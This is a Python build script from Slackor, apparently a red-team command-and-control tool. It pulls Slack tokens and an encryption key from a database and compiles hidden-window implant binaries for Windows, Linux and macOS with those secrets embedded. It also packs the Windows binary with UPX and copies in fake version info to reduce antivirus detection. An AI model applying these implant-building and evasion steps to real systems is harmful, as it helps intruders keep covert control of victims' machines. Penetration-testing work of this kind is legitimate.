github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/agent.py (about) 1 import random 2 import sqlite3 3 import hashlib 4 import subprocess 5 import os.path 6 7 conn = sqlite3.connect('slackor.db') 8 9 # Connect to database and get keys 10 auths = conn.execute("SELECT * FROM KEYS") 11 for row in auths: 12 token = row[1] 13 bearer = row[2] 14 aes_key = row[3] 15 16 # Connect to database and get channels 17 channels = conn.execute("SELECT * FROM CHANNELS") 18 for row in channels: 19 commands = row[1] 20 responses = row[2] 21 registration = row[3] 22 23 conn.close() 24 25 # Reduce A/V detection by having valid looking versioninfo 26 if not os.path.exists("versioninfo.json"): 27 subprocess.run(["bash", "-c", "cp -p versioninfo.example.json versioninfo.json"]) 28 if not os.path.exists("versioninfo.manifest"): 29 subprocess.run(["bash", "-c", "cp -p versioninfo.example.manifest versioninfo.manifest"]) 30 if not os.path.exists("icon.ico"): 31 subprocess.run(["bash", "-c", "cp -p icon.example.ico icon.ico"]) 32 33 # Build exe and pack with UPX 34 subprocess.run(["bash", "-c", "GO111MODULE=on go generate"]) 35 subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=windows GOARCH=amd64 go build -o dist/agent.windows.exe -ldflags \"-s -w -H windowsgui -X github.com/Coalfire-Research/Slackor/internal/config.ResponseChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.RegistrationChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.CommandsChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.Bearer=%s -X github.com/Coalfire-Research/Slackor/internal/config.Token=%s -X github.com/Coalfire-Research/Slackor/internal/config.CipherKey=%s -X github.com/Coalfire-Research/Slackor/internal/config.SerialNumber=%s\"" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))]) 36 subprocess.run(["bash", "-c", "cp -p dist/agent.windows.exe dist/agent.upx.exe"]) 37 subprocess.run(["bash", "-c", "upx --force dist/agent.upx.exe"]) 38 39 # Build for linux and macOS 40 subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=linux GOARCH=amd64 go build -o dist/agent.64.linux -ldflags \"-s -w -X github.com/Coalfire-Research/Slackor/internal/config.ResponseChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.RegistrationChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.CommandsChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.Bearer=%s -X github.com/Coalfire-Research/Slackor/internal/config.Token=%s -X github.com/Coalfire-Research/Slackor/internal/config.CipherKey=%s -X github.com/Coalfire-Research/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))]) 41 subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=linux GOARCH=386 go build -o dist/agent.32.linux -ldflags \"-s -w -X github.com/Coalfire-Research/Slackor/internal/config.ResponseChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.RegistrationChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.CommandsChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.Bearer=%s -X github.com/Coalfire-Research/Slackor/internal/config.Token=%s -X github.com/Coalfire-Research/Slackor/internal/config.CipherKey=%s -X github.com/Coalfire-Research/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))]) 42 subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=darwin GOARCH=amd64 go build -o dist/agent.darwin -ldflags \"-s -w -X github.com/Coalfire-Research/Slackor/internal/config.ResponseChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.RegistrationChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.CommandsChannel=%s -X github.com/Coalfire-Research/Slackor/internal/config.Bearer=%s -X github.com/Coalfire-Research/Slackor/internal/config.Token=%s -X github.com/Coalfire-Research/Slackor/internal/config.CipherKey=%s -X github.com/Coalfire-Research/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))]) 43 44 # Print hashes 45 filenames = ["dist/agent.windows.exe", "dist/agent.upx.exe", "dist/agent.64.linux", "dist/agent.32.linux", "dist/agent.darwin"] 46 for filename in filenames: 47 # TODO: use buffers/hash update if the agent ever gets big 48 f = open(filename, 'rb').read() 49 h = hashlib.sha256(f).hexdigest() 50 print(h + " " + filename)